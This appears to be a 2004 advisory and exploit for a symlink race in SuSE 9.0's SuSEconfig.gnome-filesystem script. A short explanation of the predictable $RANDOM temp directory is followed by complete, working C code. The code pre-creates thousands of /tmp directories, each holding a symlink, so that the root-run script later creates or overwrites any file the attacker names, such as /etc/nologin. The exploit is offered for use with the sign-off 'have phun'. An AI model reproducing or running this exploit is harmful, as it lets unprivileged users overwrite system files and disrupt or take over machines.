susegnome.txt

`  
  
Author: l0om <[email protected]>   
Date: 12.01.2004   
page: www.excluded.org   
  
SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem   
  
There is a symlink problem in the   
SuSEconfig.gnome-filesystem   
scribt. a normal user can creat and overwrite every   
file   
on the system. This script gets executed after a   
configuration change by the   
setup tool YaST. So if you have installed gnome or   
parts of gnome check this out.   
  
  
When this scribt gets executed by YaST after a   
configuration change it does the following:   
  
TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM   
mkdir $TEMP   
touch $TEMP/list   
[...]   
echo >$TEMP/found   
[...]   
  
the env variable $RANDOM includes a random number.   
in my tests   
this number goes up from 1 to 33000. But also if it   
goes up to   
65535 it is still vul. to a symlink attack. this is   
nearly as   
bad as the symlink problem which has been found on   
SuSE 8.2.   
On 8.2 a SuSEconf scribt has created a link with the   
$$ at the   
file end.   
  
I have used a little exploit written in C which   
creats the   
directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1"   
up to   
33000. in every directory i have created a symlink   
to a file   
which i want to creat or to overwrite. as the   
filename i have   
taken the $TEMP/found and let it point to some file.   
in my test i   
have taken the /etc/nologin- and hey- it has worked!   
  
have phun!   
  
  
*******************************************************************/   
  
#include <stdio.h>   
#include <unistd.h>   
#include <string.h>   
  
#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."   
#define START 1   
#define END 33000   
  
int main(int argc, char **argv)   
{   
int i;   
char buf[150];   
  
printf("\tSuSE 9.0 YaST script   
SuSEconfig.gnome-filesystem exploit\n");   
printf("\t-------------------------------------------------------------  
\n");   
printf("\tdiscovered and written by l0om   
<[email protected]>\n");   
printf("\t WWW.EXCLUDED.ORG\n\n");   
  
if(argc != 2) {   
printf("usage: %s <destination-file>\n",argv[0]);   
exit(0xff);   
}   
  
printf("### hit enter to create or overwrite file %  
s: ",argv[1]); fflush(stdout);   
read(1, buf, 1); fflush(stdin);   
  
umask(0000);   
printf("working\n\n");   
for(i = START; i < END; i++) {   
snprintf(buf, sizeof(buf),"%s%d",PATH,i);   
if(mkdir(buf,00777) == -1) {   
fprintf(stderr, "cannot creat directory [Nr.%d]  
\n",i);   
exit(0xff);   
}   
if(!(i%1000))printf(".");   
strcat(buf, "/found");   
if(symlink(argv[1], buf) == -1) {   
fprintf(stderr, "cannot creat symlink from %s to %s   
[Nr.%d]\n",buf,argv[1],i);   
exit(0xff);   
}   
}   
printf("\ndone!\n");   
printf("next time the SuSE.gnome-filesystem script   
gets executed\n");   
printf("we will create or overwrite file %s  
\n",argv[1]);   
return(0x00);   
} /* i cant wait for the new gobbles comic!! */   
`